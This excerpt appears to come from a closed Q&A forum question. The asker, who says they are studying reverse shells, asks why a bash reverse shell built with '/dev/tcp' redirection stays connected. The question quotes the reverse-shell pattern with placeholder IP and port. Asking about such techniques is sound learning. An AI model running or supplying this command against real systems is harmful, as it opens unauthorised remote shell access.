How does bash > /dev/tcp/"ip"/"port" 0<&1 keep connection alive? [closed]
I am studying a reverse shell created by /dev/tcp.
When you create a tcp socket using /dev/tcp, it ends its connection immediately after
data is sent. But when you create a reverse shell by bash > /dev/tcp 0<&1, it keeps the tcp … Continue reading How does bash > /dev/tcp/"ip"/"port" 0<&1 keep connection alive? [closed]